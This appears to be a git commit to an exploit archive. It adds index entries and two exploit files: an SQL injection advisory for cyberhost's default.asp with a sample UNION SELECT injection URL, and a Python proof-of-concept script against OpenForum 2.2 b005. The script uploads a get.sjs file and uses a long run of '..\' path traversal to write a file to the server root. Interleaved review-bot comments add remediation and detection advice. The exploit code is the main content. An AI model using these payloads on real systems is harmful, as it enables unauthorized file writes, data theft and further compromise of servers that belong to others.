Updated 07_13_2014
parent
7d14cd14d8
commit
6d75764f0a
3 changed files with 101 additions and 0 deletions
|
@ -30651,3 +30651,5 @@ id,file,description,date,author,platform,type,port
|
|||
34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 'editing_files.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
|
||||
34032,platforms/php/webapps/34032.txt,"NPDS Revolution 10.02 'admin.php' Cross-Site Request Forgery Vulnerability",2010-05-20,"High-Tech Bridge SA",php,webapps,0
|
||||
34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0
|
||||
34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
|
||||
34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
|
||||
|
|
|
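--- a/platforms/asp/webapps/34034.txt
+++ b/platforms/asp/webapps/34034.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40357/info
+
+cyberhost is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/default.asp?gb=paketayrinti&id=18+union+select+0,1,2,3,4,5,6,7+from+uye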
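Review bot: The advisory text never names the injectable parameter or a fix, so a reader has to infer both from the sample URL on the last line, where the injected value sits in `id` of `default.asp`. I would add a line such as `Affected parameter: id (default.asp). Remediation: validate id as an integer and pass it to the query as a bound parameter.` No affected version is given either; if the source advisory lists one, it belongs in this file.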
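--- a/platforms/php/webapps/34035.sjs
+++ b/platforms/php/webapps/34035.sjs
@@ -0,0 +1,92 @@
+source: http://www.securityfocus.com/bid/40364/info
+
+OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
+
+Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
+
+OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
+
+#============================================================================================================#
+# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
+# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
+# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
+# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
+# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
+# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
+# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
+# #
+#============================================================================================================#
+# #
+# Vulnerability............Arbitrary File Write #
+# Software.................Open Forum Server 2.2 b005 #
+# Download.................http://code.google.com/p/open-forum #
+# Date.....................5/23/10 #
+# #
+#============================================================================================================#
+# #
+# Site.....................http://cross-site-scripting.blogspot.com/ #
+# Email....................john.leitch5@gmail.com #
+# #
+#============================================================================================================#
+# #
+# ##Description## #
+# #
+# An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be #
+# exploited to write to the local file system of the server. #
+# #
+# #
+# ##Exploit## #
+# #
+# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder. #
+# #
+# #
+# ##Proof of Concept## #
+# #
+import sys, socket
+host = 'localhost'
+port = 80
+
+def send_request(request):
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.settimeout(32) # sometimes it takes a while
+s.connect((host, port))
+s.send(request)
+
+response = s.recv(8192) + s.recv(8192) # a hack within a hack
+
+return response
+
+def write_file():
+try:
+content = '----x--\r\n'\
+'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
+'Content-Type: application/octet-stream\r\n\r\n'\
+'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
+'data = "hello, world";\r\n'\
+'user = transaction.getUser();\r\n'\
+'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
+'transaction.sendPage("File Written");\r\n\r\n'\
+'----x----\r\n'
+
+response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
+'Host: ' + host + '\r\n'
+'Content-Type: multipart/form-data; boundary=--x--\r\n'
+'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)
+
+if 'HTTP/1.1 302 Redirect' not in response:
+print 'Error writing get.sjs'
+return
+else: print 'get.sjs created'
+
+response = send_request('GET OpenForum HTTP/1.1\r\n'
+'Host: ' + host + '\r\n\r\n')
+
+if 'File Written' not in response:
+print 'Error writing to root'
+return
+else: print 'x.txt created in root'
+
+except Exception:
+print sys.exc_info()
+
+write_file()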
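Review bot: The file is committed as `34035.sjs`, but from `import sys, socket` onward it is a Python 2 script (bare `print` statements); only the multipart body it assembles is server-side script, so extension-based tooling and scanners will misclassify it. The header also describes the flaw without any remediation or detection guidance. I would add a comment such as `# Mitigation: saveAsAttachment should reject names containing '..' or path separators and confirm the resolved path stays inside the attachment directory.` For defenders, the visible indicators are an attachment upload named `get.sjs` and attachment file names carrying repeated `..\` sequences, and the header could say so.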